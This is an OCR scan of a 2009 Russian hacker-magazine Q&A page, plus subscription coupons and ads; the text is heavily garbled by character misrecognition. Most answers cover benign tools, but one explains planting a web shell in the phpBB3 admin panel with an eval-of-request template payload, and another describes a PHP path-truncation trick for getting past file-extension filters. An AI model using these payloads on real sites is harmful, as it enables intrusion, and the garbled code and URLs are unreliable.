• Удаляем всех друзей ; 

2 . Видео + аудио + фото: 

• Удаление всех аудиозаписей; 

• Удаление всех видеозаписей; 

• Скрипт для удаления отметок с Видео и Фото; 

• Скрипт для подтверждения отметок на Видео и 
Фото; 

3. Альбомы: 

• Перемещение картинок/фото из одного 
альбома в другой; 

• Создание множества альбомов; 

• Удаление пустых альбомов; 

• Скачиваем все картинки из альбома (Группа + 
Пользователь); 



4 . Группы: 

• Автоматическое вступление в группы; 

• Удаляем все группы; 

• Удаление всехучастников группы; 

• Удаление всехтем (обсуждения) в группе; 

• Чистим альбом группы от спама картин- 
ками; 

5 . Вопросы: 

• Создание множества вопросов; 

• Удаление вопросов; 

6. Стена: 

• Удаляем все сообщения на стене; 

7 . Сообщения: 

• Удаляем все входящие личные сообщения; 

8 . Приложения: 

• Приглашение всехдрузей; 

9 . Настройки профиля: 

• Чистка черного списка пользователя. 

0: Где бы найти наиболее полный список русских 
и буржуйских социальных сетей? 

А: Недавно на Анти чате задались таким 
же вопросом и открыли специальную тему, 
посвященную сбору ссылок и описаний всех 
существующих в мире социальных сетей: 



ЬирзУЛогит.апІісЬаГгиЛЬгеасІІ 401 1 7.ЧтІ 
На данный момент в теме собрано около 
700 ссылок. Вотлишь краткая выдержка из 
списков соцсетей от ЕггогЫео: 

Крупнейшие соцсети мира (150 + ) , для 
каждой указаны ее характеристики/ 
особенности : 

ГШСр : / /еп . мікіресііа . огд/ѵ\гікі/Ьізк_ 
о і: _з о с і а 1_пе Стаю г к і пд_меЬ з і С е з 

Все соцсети Германии + крупнейшие 
соцсети мира : 

ЫгСр: / /Іи&сіег .сіе/ 

агкікеІ/2008/04/09/175-іпРегпеР- 

сошшипікуз/ 

150 наиболее известных соцсетей в 
Испании : 

кккр : / /ез .мікіресііа.огд/ 

мікі / Апехо : Кес1ез_зосіа1ез_еп_ 

ІпкегпеС 

Список из 16 итальянских соцсетей: 

ГШСр : / /ІР . мікіресііа . огд/ѵ^ікі/Кеке_ 
зосіаіе 

18 наиболее известных соцсетей во 
Франции : 
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РШкр: / /Иг . мікіресііа . огд/мікі/ 
КезеаиРаде_зосіа1 

22 крупнейшие соцсети мира с описа- 
ниями/ссылками : 

ЪРРр: //ги.мікіресііа. огд/мікі/Соци- 
альная_сеть_ ( Интернет ) 

Список из 30 российских (а также 
иностранных, которые поддержи- 
вают русский язык) социальных 
сетей : 

ЪРРр : / /ти .'мікіресііа . огд/мікі/ 
Шаблон : Социальная_сеть_ ( Интернет ) 

0: Хочу проследить историю перемещения 
одного домена по различным провайдерам. Как 
это сделать? 

А: Советую воспользоваться популярным 
в среде домейнеров сервисом ѵѵѵѵѵѵ.1 зІаЕ 
Ш. который собирает статистику по домен- 
ным зонам РІІ и 511. Данный сервис сможет 
предоставить тебе подробную статистику по 
регистраторам и владельцам указанных зон. 
По отдельным же сайтам предоставляется, 
собственно, история перемещения домена по 
провайдерам с момента регистрации домена, 
история ѵѵбоіз, статистика Ііѵеі піегпеі: и акту- 
альный ѵѵбоіз. Также можно воспользоваться 
поиском по следующим параметрам: домен- 
ное имя, имя/название владельца, етаіі 
владельца, телефон владельца, провайдер/ 
набор N5, дата регистрации, дата разделеги- 
рования, дата освобождения, регистратор. 

0: Какзалить шелл в админке рНрВВЗ? 

А: Для этой версии известного форумного 
движка в паблике существуют пока что два 
способа заливки шелла. Первый способ от 
ОеерХЬабоѵѵ: 

1- Вкладка «Общие» Безопасность 
Разрешить рбр в шаблонах: Да; 

2. Вкладка «Стили» Компоненты стилей 
Шаблоны. 

С помощью встроенного редактора шаблонов 
выбираем какой-нибудь файл и пишем в него: 

<!-- РНР --> еѵаі ( $_КЕ(ЖЕ8Т [стб] ) 
<!-- ЕББРНР --> 

Далее применяем шаблон, идем на изменен- 
ную страницу и наслаждаемся нашим шеллом. 
Второй способ от_дг341: (модификация 
предыдущего способа для урезанных прав 
на запись в файлы): Вкладка «Стили» -> 
Шаблоны^ Детали Сохранять шаблоны в: 
«Базе данных». 

Далее правим нужный шаблон (например, 

Іад Ьосіѵ. Ы: т I ] . заходим на ЬирѴ/зіІе.сот/ 
ІогитАад.рбр и снова пользуемся нашим 
шеллом. 



0: Хочу написать свой ІСО-клиент. Подскажи, 
где бы взять исходники готового клиента для 
наглядности? 

А: Для начала изучения работы протокола 
05САР, на котором построена ася, советую 
изучить исходники заброшенного, но вполне 
рабочего и красивого проекта РАІМ: Шр:// 
гоіісѵ. гапІх.сотЛаіт . 

Далеетебе очень поможет небезызвестный 
открытый мессенджер Мігапба: 
ЬШрѴ/тігапсІа.доодІесосІе.сопп — собственно, 
описание и исходники проекта: ЬШрУ/сосІе. 
аооаІе.сот/р/ппігапсІа/зоигсе/Ьгоѵѵзе — про- 
смотр исходников в онлайне. 

А если ты кодишь на Делфях.то изучение ника- 
ких протоколов не потребуется — просто юзай 
компонентТІСОСІіепІ: :]. 

О: Не так давно сдох сервис іпЩр20. сот и ему 
подобные. Кактеперь просматривать выдачу 
гугла из-под амерскогоІР в амерскихже дата- 
центрах? 

А:Специальнодлятебя наш любимый Гугл создал 
сервис для тестирования рекламы в боодіе 
АбѴѴогбз, который позволяетпросматривать выдачу 
по одному и томужекейворду в разных странах и на 
разных языках, независимо оттвоего текущего ІР. 
Например, для запроса «Ьиу ѵіадга» ссылка на 
тестовую страницу адвордс будет выглядеть: 
Ыі:р://ѵѵѵѵѵѵ.доод[е.сот/5еагсЬ?асІ1:е5І:=оп&Ы=е 
п&бозі:=доод1.е.сопп&дІ.=Ц5&д=Ьиѵ+ѵіадга&ад= 
б&од=&аді= . 

Если же ты не хочешь заморачиваться с 
параметрами в адресной строке, то зайди на 
кастомную страничку сервиса: ЫірзУ/асІѵѵогсІз. 
доодІе.сот/зеІесі/АсІТагдеІіпдРгеѵіеѵѵТооІ . 
Здесь можно манипулировать со следующим 
стаффом: 

• ключевое слово; 

• домен боодіе (например, доодіе.со.ик ): 

• языкотображения; 

• страна; 

• регион; 

• координаты. 

Как видишь, возможности Большого Брата 
впечатляют: настроив под себя различные па- 
раметры, ты увидишь разную выдачу в разных 
доменах, странах и регионах. 

Также хочу порекомендовать замечательный 
сервис от4зео.ЬІ2 — скрипт проверки позиций 
в поисковиках ( ШрѴМзео.ЬігЛооІз/ІЗ ). Здесь 
ты сможешь проверить позицию своей стра- 
нички по сразу нескольким ключевым словам в 
выдаче доодіе, Ь і п д , у а Ь о о , гатЫег, уапбех. 

0: По каким уровням анонимности различаются 
прокси? 

А: Всего существует 4 вида уровня анонимности 
прокси-серверов: 



1. Тгапзрагепі: — прозрачные прокси, пред- 
назначенные не для сокрытия инфы о твоем 
ІР-адресе, а для, например, кеширования 
информации. Передают следующую информа- 
цию в переменных окружения: 

КЕМОТЕ_АББК — ІР- адрес прокси; 

НТТР_ѴІА — ІР-адрес или имя прокси; 

НТТР_Х_ЕОКМАКБЕБ_ЕОК _ твой ІР . 

2. Апопутоиз — простые анонимные прокси, 
которые подменяют твой ІР на свой, но не 
скрывают того, что они являются проксями. 
Переменные окружения у них будут выглядеть 
следующим образом: 

КЕМОТЕ_АББК — ІР-адрес прокси; 

НТТР_ѴІА — ІР-адрес или имя прокси; 

НТТ Р_Х_Е ОКѴ\/АКБЕБ_Е О К. - ІР-адрес 

прокси . 

3. Бізіюгбпд — искажающие прокси. Также 
не скрывают того факта, что используется 
проксик, но подменяют переменную окруже- 
ния НТТР_Х_РОРѴѴАРПЕП_РОР на случайный 
ІР-адрес. 

4. НідЬ апопутоиз/еіііе — самый безопасный 
вид прокси. Скрывают даже сам факт того, 
что используется левый ІР. Переменные окру- 
жения в данном случае будут такими же, как 

и вовсе без использования проксей (только 
вместо твоего адреса будет стоять адрес 
прокси): 

КЕМОТЕ_АББК — ІР-адрес прокси; 

НТТР_ѴІА — пусто; 

НТТ Р_Х_Е ОИл/АКВ Е Б_Е О К - пусто . 

0: В каких еще случаях, кроме инклудов, рабо- 
тает уязвимость РНР с обрезанием расширения 
слешами НИр://5ІІе.сот/?Ше=іпсіех.рНр/// 
[...4096/...]///.) Р д? 

А: К сожалению, не раз описанная вЗС РНР 
Ріераіб Ігипсабоп ѵиІпегаЬіІЛу работает толь ко 
в функциях инклуда: іпсіибе, гедиіге, іпс1ибе_ 
опсе, гедиіге_опсе. Но есть еще один нюанс, 
связанный с нормализацией пути в РНР: в 
некоторых функциях имя файла «РІе.рбр» будет 
равнозначно имени файла со слешем и точкой 
в конце (причем, таких последовательностей 
может быть очень много) — «ЛІе.рЬр/.», так 
какэти символы просто-напросто вырезают- 
ся интерпретатором. Благодаря этому факту 
становится возможным обход множества филь- 
тров, которые перед загрузкой/чтением файла 
проверяютего расширение. А вот и список 
таких функций: 

1. (іпсіисіеі гедиіге)(_опсе) 

• 6І\ІІ)/ипих обрезает одну или более после- 
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довательностей из символов \х2Р (/) и \х2Е (.] 
в конце файла (не работает, если установлен 
ЗиЬозіп раІсЫ; 

• ѴѴіпсІоѵѵз обрезает последовательности из\ 
х20 ( ]Дх22 (")Дх2Е (.)ДхЗС (<)ДхЗЕ (>]. 

2. іореп 

• СЫи/Ыпих — те же символы \х2Е (/] и \х2Е (.] 
(опять все портитЗиЬозіп); 

• ѴѴіпсІоѵѵз — \х2Е (.]Дх2Е (/] , \х5С (\); 

• РгееВЗО — \х2 Р (/] апб\х2Е (.] (работаете 
ЗиЬозіп]. 

3. тоуе_ир[оабеб_Е1е 

• ОЫІІ/ипих опять \х2Е (/] и \х2Е (.] (работает 
даже при установленном ЗиЬозіп]; 

• ѴѴіпсІоѵѵз — \х2Е (.) , \х2Р (/] , \х5С (\); 

• РгееВЗО — \х2 Р (/] апб\х2Е (.] (работаете 
ЗиЬозіп]. 

Более подробно о данном виде атак на фай- 
ловую систему РНРты сможешь прочитать 
уавторов исследования: ЬирѴАл/ѵѵѵѵ.изЬ. 
іі/2009/07/26/рбр-1 : і[е5Ѵ5І:епп-аІ:І:аск-ѵес1:ог5- 
іаке-іѵѵо . 

О: Где можно быстро и легко определить ско- 
рость, страну, ІР дедика? 

А: Специально для этих целей люди, занима- 
ющиеся продажей/использованием дедиков, 
юзают сервис 2ір.ги . который позволяет 
определять следующие параметры: имя 
твоего компьютера, операционная систе- 
ма, браузер, страна, провайдер, скорость 
интернет-соединения, средняя скорость 
интернета, время загрузки файла, время 
реакции твоего компьютера, информация 
об ІР-адресе, стартовая страница браузе- 
ра, наличие ІР в спам-базах, безопасность 
твоего компьютера, сетевые соединения, 
тестирование файрвола и множество других 
не менее интересных фишек. Для проверки 
просто зайди в любом браузере с дедика на 
упомянутый адрес. 

О: По работе приходится использовать 155, не- 
смотря на все мои попытки перейти на АрасНе. 
Увы, поделать ничего не могу, но и отказаться 
от использования привычных .Иіасезз не полу- 
чается. Как быть? 

А: Рекомендую попробовать Неіісоп Аре 
( ѵѵѵѵѵѵ.Ье[ісопІесЬ.сопп ]. Если кратко, это 
эмулятор АрасЬе'а для 155 7. Наконец-то 
можно сделать .Ыассезз и тосІ_геѵѵгіІе для 
N5. Сейчас Неіісоп Аре включает следующие 
модули: тоб_ге\л/гі1;е, тоб_ргоху, тосІ_аи1:Ь, 
тоб_д 2 Ір, тоб_Ьеабегз, тосІ_сасЬе, тоб_ 
ехрігез, тоб_беѵеІорег, тосІ_герІасе, тоб_ 
зо, тоб_зреІіпд, тоб_изег1:гаск. Продукт 
коммерческий, но бесплатная версия позво- 
ляет использовать тулзу для трех сайтов. 

0: Во время работы под виндой очень не 
хватает дгер. Дома устанавливаю дополни- 
тельные пакеты, реализующие никсовые 



утилиты. Но что делать на других компьюте- 
рах — в особенности с полезными скрипта- 
ми, которые я активно использую в работе 
ежедневно? 

А: Мало кто знает, но в винде есть своя 
реализация утилиты дгер, а точнее сказать, 
даже две аналогичные команды. Первая — 
бпб — неудобна в использовании, потому 
кактекстдля поиска приходится обобщать в 
кавычки. Вторая команда — ЬпсЫг — этого 
недостатка лишена и ктому же позволяет 
использовать для поиска всю мощь регуляр- 
ных выражений. Отыскать в выводе коман- 
ды бігте директории, которые содержат в 
себе словосочетание РуіЬоп, можно так: 

С:\>сН_г | НіпсІзЦг РуЩтоп 
03.11.2009 14:08 <БІК> 

РуЦІюп2 б 

Результат налицо, но еще удобнее было бы 
создать а л иа с для этой команды, чтобы вмес- 
то Ьпсізіт использовать привычный дгер. Нет 
проблем — создаем и его: 

есЬо ІіпсІзЦг %1 %2 %3 %4 %5 > 
%зузСешгооЦ%\дгер . стсі 

Воттеперь никакихтрудностей: 

С : \>пеСзЦа1і -ап | дгер ЫЗТЕЫ 
С : \>1іпсізЦг Ы8ТЕЫ 

ТСР 0.0.0.0:135 0.0. 0.0:0 ЫЗТЕКГШО 
ТСР 0 . 0 . 0 . 0 : 445 0 . 0 . 0 . 0 : 0 Ы5ТЕШШ 
ТСР 0 . 0 . 0 . 0 : 554 0 . 0 . 0 . 0 : 0 ІЯЗТЕЫІШ 
ТСР 0.0.0.0:2869 0.0.0. 0:0 ЫЗТЕЖШ 



Аналогично создаются алиасы для: 

• ібсопбід 

есНю ІР " %1 " == " -а" (ірсопіід /аіі) 
ЕЬЗЕ (ірсопіід %1) > %зузСешгооЦ%\ 
ііеопіід . стсі 

• тап 

есЬо %1 /?> %зузСетгосЩ%\тап . стсі 

• І5 

есію Ыіг %1 %2 %3 %4 %5ф > 
%зузСетгооЦ%\1з . стсі 

О: Замучался заливать на сервер файлы веб- 
проекта после каждого исправления — делаю 
это вручную через РТР-клиент. Подскажите, как 
это делать наиболее правильно — ведь естьже 
возможность вносить правки автоматически? 

А: Правильнее всего, конечно, исполь- 
зовать систему контроля версий — в этом 



случае все изменения можно откатить. 
Несложно пишется скрипт, который будет 
заливать на сервер самую актуальную 
версию из 5ѴІ\І. Но если хочешь простой 
вариант — пожалуйста, воспользуй- 
ся ѴѴіпЗСР ( ѵѵіпзср.пеі: ). В этом случае, 
помимо автоматической загрузки файлов 
на сервер (с включенной функцией Кеер 
гетоіе бігесіогу ир Іо сіаіе], ты будешь 
использовать криптованное соединение 
посредством 5ЕТР вместо незащищенного 
РТР, который передает файлы в открытом 
виде. Смех смехом, а если посидеть со 
снифером где-нибудь в беспроводной сети 
Мака, то диву даешься, сколько паролей 
РТР можно награбить с, казалось бы, обыч- 
ных посетителей фастфуда. 

О: В чем прикол команды гоЬосору, которая поя- 
вилась в Ѵізіа и ѴѴіпсІоѵѵз 7? 

А: ПоЬосору (ПоЬиз! Еііе Сору] — это кон- 
сольная утилита для репликации (то есть, 
не просто копирования] каталогов, замена 
устаревшей хсору (и, тем более, сору]. Во- 
обще, она была доступна как часть ѴѴіпсІоѵѵз 
Резой гее КН: уже давно, однако стандартным 
компонентом стала л ишь с ѴѴіпсІоѵѵз Ѵізіа, 
ѴѴіпсІоѵѵз 7 и ѴѴіпсІоѵѵз Зегѵег 2008. В гоЬосору 
появилась поддержка дополнительных 
опций, втом числедля болееточного выбора 
файлов для копирования, синхронизации 
и поддержки сети, логирования и т.д. Тулза 
изначально разработана для отказоустой- 
чивого копирования каталогов и деревьев 
каталогов. Она обладает возможностью 
копирования всех (или выборочных) ІЧТБ5 
атрибутов и свойств, имеет дополнитель- 
ный коддля перезапуска при применении с 
сетевым соединением в случае его разры- 
вов. Чтобы воспользоваться всей мощью 
утилиты, была написана специальная гра- 
фическая оболочка РоЬосору С III, которая со 
временем превратилась в утилиту РісЬСору 
(ищи на ІесЬпеЕтісгозоК.сопп ]. 

О: Подскажите, пожалуйста, декомпилятор для 
кода на баѵа. 

А: Одна из последних «модных» про- 
грамм — 03 баѵа Оесотрііег ( Ыір:// 
тет Ьегз.іогіи песіІѵ.сот/пезЬкоѵ/ 
б] . Ыт I ] . Тулза с большой долей успеха 
может превратить в исходный код ском- 
пилированные бинарники СЬА55-фай- 
лов (например, ба ѵа -апплеты]. Причем 
ты можешьтутже внести изменения с 
помощью встроенного редактора кода с 
подсветкой синтаксиса. Примечательно, 
что для работы не нужна установленная 
6ѴМ и 6БК, но если есть необходимость 
са мому собрать бАП-а рхи в и запустить 
апплет вне контекста браузера, тогда не 
поленись их установить. ИИ 




► 140 



ХАКЕР 12 /132/ 09 







в®1 

О^оі* 



ооі. ]і ■Гп Гпіші 
§3“г П І ІШІ ІНІІ 

— 2 " -3 -= і :івіеіі_іи ^г„ Як Іі-ірі-ф 









6002 Я^дѵ^зй 1 (28 Оз I- °ы 






5 ^ 

I 



III 



Эй 

ІЙ 



!: 

III 







іі 








I 





ПОДПИСКА В РЕДАКЦИИ 





Годовая подписка по цене 2100 руб. 

из 99 % пріііррпр иру ппм ппі/\/пі/р р пп*эи м і і\/1 



(на 23 % дешевле чем при покупке в розницу) 

ЕДИНАЯ ЦЕНА ПО ВСЕЙ РОССИИ. ДОСТАВКА ЗА СЧЕТ ИЗДАТЕЛЯ. В ТОМ ЧИСЛЕ КУРЬЕРОМ ПО МОСКВЕ В ПРЕДЕЛАХ МКАД 




ВНИМАНИЕ! 

ВТОРОЕ 

^ СПЕЦПРЕДЛОЖЕНИЕ! 

ПРИ ПОДПИСКЕ НА КОМПЛЕКТ ЖУРНАЛОВ 
ЖЕЛЕЗО + ХАКЕР + 0Ѵ0: 

- ОДИН НОМЕР ВСЕГО ЗА 155 РУБЛЕЙ 
(НА 35% ДЕШЕВЛЕ. ЧЕМ В РОЗНИЦУ) 



ПЛЮС ПОДАРОК 
ОДИН ЖУРНАЛ 
ДРУГОЙ 
ТЕМАТИКИ 

ОФОРМИВ ГОДОВУЮ ПОДПИСКУ В РЕДАКЦИИ, 
ВЫ МОЖЕТЕ БЕСПЛАТНО ПОЛУЧИТЬ ОДИН 
СВЕЖИЙ НОМЕР ЛЮБОГО ЖУРНАЛА, 
ИЗДАВАЕМОГО КОМПАНИЕЙ «ГЕЙМ ЛЭНД»: 

• ЯНВАРСКИЙ НОМЕР — подписавшись 
до 30 ноября 

• ФЕВРАЛЬСКИЙ НОМЕР — подписавшись 
до 31 декабря 

• МАРТОВСКИЙ НОМЕР — подписавшись 
до 31 января 



ЗА 24 НОМЕРА 



ЗА 12 НОМЕРОВ 









«Фото- 

мастерская»+СО 



I 



«Мобильные «ТЗ. Техника «Страна Игр» 

компьютеры» Третьего Тысячелетия» +20Ѵ0 



^ *лг.! 



«Вышиваю «Тюнинг 

крестиком» Автомобилей» 




/.л 




Бгтпоке 



Тоіаі ВѴВ+ОѴО «Железо»+0Ѵ0 ОѴОХрегІ «РС Игры»+20Ѵ0 Оідібаі Рбоіо 




Бкі Разз 



«Форсаж.ТА» Моипбп Віке ОМВОАРй ТоТаІ РооіЬаІІ+ВѴО «Хулиган» 

ВПИШИТЕ В КУПОН НАЗВАНИЕ ВЫБРАННОГО ВАМИ ЖУРНАЛА, ЧТОБЫ ЗАКАЗАТЬ ПОДАРОЧНЫЙ НОМЕР 




ПОДПИШИСЬ И ВЫИГРАЙ 

ПОДАРОЧНЫЙ НАБОР СШЕТТЕ 5ЕНІЕЗ 

ГЕЛЬ ДЛЯ БРИТЬЯ 6ІИЕТТЕ ЗЕРІЕ5 РЦКЕ АЫО ЗЕИЗІТІѴЕ ДЛЯ 
ЧУВСТВИТЕЛЬНОЙ КОЖИ + БАЛЬЗАМ ПОСЛЕ БРИТЬЯ 6ШЕТТЕ 5ЕКІЕ5 С 
АЛОЕ ВЕРА. 







СЕРВИС 



ВЫГОДА • ГАРАНТИЯ • 



КАК ОФОРМИТЬ ЗАКАЗ 

1. Разборчиво заполните подписной купон и квитан- 
цию, вырезав их из журнала, сделав ксерокопию 
или распечатав с сайта ѵѵѵѵѵѵ.діс.ги . 

2. Оплатите подписку через любой банк. 

3. Вышлите в редакцию копию подписных докумен- 
тов — купона и квитанции — любым из нижепере- 
численных способов: 

• по электронной почте зиЬ$сгіЬе@дІс.ги; 

• по факсу 8 (495) 780-88-24; 

• по адресу 119021, Москва, 

ул. Тимура Фрунзе, д. 11, стр. 44, 

ООО «Гейм Лэнд», отдел подписки. 



ВНИМАНИЕ! 

ПОДПИСКА ОФОРМЛЯЕТСЯ В 
ДЕНЬ ОБРАБОТКИ КУПОНА И КВИТАНЦИИ 
С НОМЕРА. ВЫХОДЯЩЕГО ЧЕРЕЗ ОДИН 
КАЛЕНДАРНЫЙ МЕСЯЦ ПОСЛЕ ОПЛАТЫ. 

Например, если произвести оплату в ноябре, 
то подписку можно оформить с января. 

В КАЖДОМ НОМЕРЕ УНИКАЛЬНЫЙ Ш 
СТОИМОСТЬ ЗАКАЗА 

2100Р ЗА 12 МЕСЯЦЕВ + ПОДАРОЧНЫЙ ЖУРНАЛ 
1200Р НА 4 МЕСЯЦЕВ. ПОДАРОЧНЫЙ ЖУРНАЛ ПРИ ЭТОМ НЕ ВЫСЫ- 
ЛАЕТСЯ 



ПО ВСЕМ ВОПРОСАМ, связанным с подпиской, звоните по 
бесплатным телефонам 8(495)780-88-29 (для москви- 
чей) и 8(800)200-3-999 (для жителей других регионов 
России, абонентов сетей МТС, БиЛайн и Мегафон). 

ВАШИ ВОПРОСЫ. ЗАМЕЧАНИЯ И/ИЛИ 
ПРЕДЛОЖЕНИЯ ПО ПОДПИСКЕ НА ЖУРНАЛ ПРОСИМ 
ПРИСЫЛАТЬ НА АДРЕС: іпіойдіс.ги 



ОФОРМИТЬ ПОДПИСКУ на Хакер стало еще 
проще! 

С июля 2009 года это можно сделать 
в любом из 72 000 платежных терминалах 

ОІѴѴІ (КИВИ) по всей России. 




ПОДПИСНОЙ КУПОН 



ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
НА ЖУРНАЛ « 


» 


П на 6 месяцев 
]] на 12 месяцев 




начиная с 


о 

С\| 


^ прошу выслать бесплатный 
номер журнала 



|— I Доставлять журнал по почте 
1 на домашний адрес 

Доставлять журнал курьером : 

□ на адрес офиса* 

□ на домашний адрес** 

(отметь квадрат выбранного варианта подписки) 

Ф.И.О. 



АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ) 

код 

е-таіі 

сумма оплаты 

*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 

свободное поле 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

ОАО «Нордеа Банк», г. Москва 

р/с N° 40702810509000132297 



к/с № 30101810900000000990 



БИ К 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


20 г. 





Кассир 



Ф.И.О. 

Подпись плательщика 



Квитанция 



ИНН 7729410015 



ООО «Гейм Лэнд» 



ОАО «Нордеа Банк», г. Москва 
р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИ К 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


20 г 





Кассир 



Ф.И.О. 

Подпись плательщика 
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Для установки важных 
приложений одним 
махом 



Я ф Я |-| ИіІІи 



ІІМѴІТЕР 

іпѵііег.ги 




ЫІЫІТЕ 

піпііе.сот 



Как собрать джентльменский набор необходимого софта после переус- 
тановки системы? Ломиться в Сетьза свежими дистрибутивами и потом 
кропотливо запускать один инсталлятор за другим? Нетуж, извините — 
наш ответ ІЧіпіІе! Все, что нужно: зайти на піпТе.сот . выбрать из списка 
приложения, которые нужно установить, и получить на выходе готовый 
инсталлятор. Тот сам подкачаетдистрибутивы программ итихо установит 
их в систему сдефолтными настройками. Чертовски удобно! 







ѵлЛсІіѵфк ви- іЬічі: 




_1\ — ЩЁ 

Для отслеживания 
изменений на сайтах 



Английское слово «іпѵііе» давно не только не пугает русского пользова- 
теля, но и, напротив, всячески манит. Приглашение на закрытый ресурс 
в большой цене и найти его зачастую не так просто. Хорошо, если есть 
знакомый сзаветным инвайтом, но если такого знакомого нет? Найти 
людей, которые готовы поделиться приглашением или, на худой конец, 
выменять его на что-то другое, поможет ресурс іпѵТег. На текущий момент 
это 4085 пользователей, предлагающих 1 7318 инвайтов на разных сайтах. 
И боодіе ѴѴаѵе — в том числе! 
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Для анализа исполняемого 
файла 
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СНАЫ6Е0ЕТЕСТІ0Ы 

СЬапдесІеіесйоп.сот 

Бесплатный сервис, который монитор веб-сайты и отслеживает все 
изменения, докладывая о новыхданных или, наоборот, исчезнувшем 
содержании тебе на е-таіі. Все изменения подсвечиваются для большей 
наглядности, а чтобы внести ясность, когда каждое из них произошло, 
СбапдеОеіесбоп ведетисторию изменений с временными метками. Про- 
верка осуществляется раз в день, причем на процесс можно повлиять, 
указав нужные параметры для мониторинга. 



СѴѴ5АЫ0В0Х 

ѵѵмѵѵ.сѵѵзапсІЬох.огд 

Проверить бинарниктремя десятками антивирусов можно на ѵігизіоіаі. 
сот, ното лишь статический анализ. Зачастую гораздо важнее узнать, 
как ведет себя приложение после запуска — какие изменения вносит в 
реестр, какие файлы изменяет, куда обращается в инете. Для этого файл 
обычно приходится запускать в «песочнице» или под виртуальной маши- 
ной с включенными мониторами (ПедМоп/РіІеМоп от Марка Руссиновича, 
например). Теперь есть еще один способ — залить файл на онлайн -сервис 
СѴѴЗапбЬох, который проведетанализ сам и выдаст подробный результат. 
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ХАКЕР 12 /132/ 09 






20:35 ПО БУДНЯМ 



СТЮАРДЕССЫ 



КОМЕДИЙНЫМ сериал 





БОЛЬШЕ 

ЧШ МУЗЫКА 



ПОДРОБНОСТИ НА САЙТЕ ѴДШ.МТи.ВО 



РЕКЛАМА 







